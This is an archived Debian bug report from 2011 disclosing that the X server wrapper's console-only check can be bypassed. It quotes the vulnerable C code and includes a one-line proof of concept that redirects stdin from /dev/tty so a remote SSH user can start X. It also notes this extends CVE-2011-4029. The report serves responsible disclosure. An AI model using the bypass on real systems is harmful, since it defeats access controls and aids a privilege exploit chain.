Bug#652249: bypass default security level of the X wrapper

To: submit@bugs.debian.org
Subject: Bug#652249: bypass default security level of the X wrapper
From: vladz <vladz@devzero.fr>
Date: Thu, 15 Dec 2011 19:02:36 +0100
Message-id: <[🔎] 20111215180236.GA32390@devzero.fr>
Reply-to: vladz <vladz@devzero.fr>, 652249@bugs.debian.org

Package: xserver-xorg
Version: 1:7.5+8
Severity: important
Tags: security


By default, the wrapper's configuration file only allows any user whose
controlling TTY (console) to start the X server with root privileges: 

  # cat /etc/X11/Xwrapper.config
  [...]
  allowed_users=console

To determine if a user is controlling a TTY, the code checks the
properties of the file connected to its standard input:

  $ cat -n debian/local/xserver-wrapper.c
  [...]
  152 static int
  153 onConsole()
  154 {
  155 #if defined(__linux__)
  156   struct stat s;
  157
  158   /* see if stdin is a virtual console device */
  159   if (fstat(0, &s) != 0) {
  160     (void) fprintf(stderr, "X: cannot stat stdin\n");
  161     return FALSE;
  162   }
  163   if (S_ISCHR(s.st_mode) &&
  164         ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV &&
  165           (s.st_rdev & 0xff) < 64) ||
  166         (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV &&
  167           (s.st_rdev & 0xff) < 64)
  168         )) {
  169     return TRUE;
  170   }

As seen, this is done by checking if this file:

  - is a character device [line 163]
  - has a TTY-specific major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV,
    respectively 4 or 5) [lines 164, 166]
  - has a minor number lower than 64 [lines 165, 167]

Unfortunately, by connecting a file with similar properties to its
stdin, a user can mislead the X wrapper and launch the X server.  This
file also needs to be readable by the user.

For instance, files "/dev/tty" and "/dev/ptmx" match those conditions:

  $ ls -l /dev/tty /dev/ptmx
  crw-rw-rw- 1 root root 5, 2 14 déc.  18:43 /dev/ptmx
  crw-rw-rw- 1 root root 5, 0 12 déc.  23:03 /dev/tty

Here is a quick PoC by using "/dev/tty":

  $ ssh remote_host
  $ id
  uid=1000(vladz) gid=1000(vladz) groups=1000(vladz)
  $ tty
  /dev/pts/4   // not a TTY, won't have sufficient permissions to start X
  $ X :1
  X: user not authorized to run the X server, aborting.

  // This was the expected result, now lets connect "/dev/tty" to stdin and
  // retry...

  $ exec 0</dev/tty; X :1; exec 0</dev/pts/4
  [... Xorg starts ...]    // start succeed!

This being said, this is a minor issue, but the attack against
CVE-2011-4029[1] which allows to set the read permission on any arbitrary
file, can now be launched from remote sessions and not even from a TTY.  It
become urgent to fix it.

  [1] http://security-tracker.debian.org/tracker/CVE-2011-4029

Thanks,
vladz. 

-- 
http://vladz.devzero.fr
PGP key 8F7E2D3C from pgp.mit.edu

Reply to:

Follow-Ups:
- Bug#652249: bypass default security level of the X wrapper
  - From: Julien Cristau <jcristau@debian.org>
- Bug#652249: marked as done (bypass default security level of the X wrapper)
  - From: owner@bugs.debian.org (Debian Bug Tracking System)
- Bug#652249: marked as done (bypass default security level of the X wrapper)
  - From: owner@bugs.debian.org (Debian Bug Tracking System)

Prev by Date: Bug#531726: compiz-core: unresolved symbols in corelib
Next by Date: Bug#652249: bypass default security level of the X wrapper
Previous by thread: Bug#531726: compiz-core: unresolved symbols in corelib
Next by thread: Bug#652249: bypass default security level of the X wrapper
Index(es):
- Date
- Thread